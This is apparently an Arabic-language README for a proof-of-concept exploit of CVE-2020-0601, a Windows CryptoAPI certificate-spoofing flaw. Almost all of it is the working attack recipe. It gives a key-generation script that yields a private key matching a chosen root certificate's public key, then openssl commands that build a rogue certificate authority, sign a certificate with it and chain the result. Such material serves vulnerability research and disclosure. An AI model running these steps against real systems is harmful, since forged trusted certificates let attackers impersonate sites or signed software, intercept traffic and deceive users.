
إثبات مفهوم لـ CVE-2020-0601
CVE-2020-0601: استغلال ثغرة انتحال هوية Windows CryptoAPI. مزيد من المعلومات في مقالة المدونة.
pip install -U -r requirements.txt
يعمل إنشاء الشهادة مع إصدار OpenSSL حتى 1.0.2u.
استخدمنا USERTrust ECC Certification Authority لكن يمكن أن يكون أي شهادة جذر تعمل على منحنى P-384.
لتوليد مفتاح خاص يطابق المفتاح العام من شهادة الجذر، استخدمنا السكربت gen-key.py (يعمل مع Python 3.6 وما فوق):
$ ./gen-key.py RootCert.pem
يمكن عرض المفتاح باستخدام:
$ openssl ec -in p384-key-rogue.pem -text
ثم لتوليد CA المزوّر:
$ openssl req -key p384-key-rogue.pem -new -out ca-rogue.pem -x509 -config ca.cnf -days 500
ثم نقوم بتوليد المفتاح الخاص والشهادة التاليين:
openssl ecparam -name prime256v1 -genkey -noout -out prime256v1-privkey.pem
openssl req -key prime256v1-privkey.pem -config openssl.cnf -new -out prime256v1.csr
openssl x509 -req -in prime256v1.csr -CA ca-rogue.pem -CAkey p384-key-rogue.pem -CAcreateserial -out client-cert.pem -days 500 -extensions v3_req -extfile openssl.cnf
أخيرًا، للحصول على السلسلة الكاملة في ملف واحد، نقوم بدمج شهادة CA وشهادة الخادم:
cat client-cert.pem ca-rogue.pem > cert.pem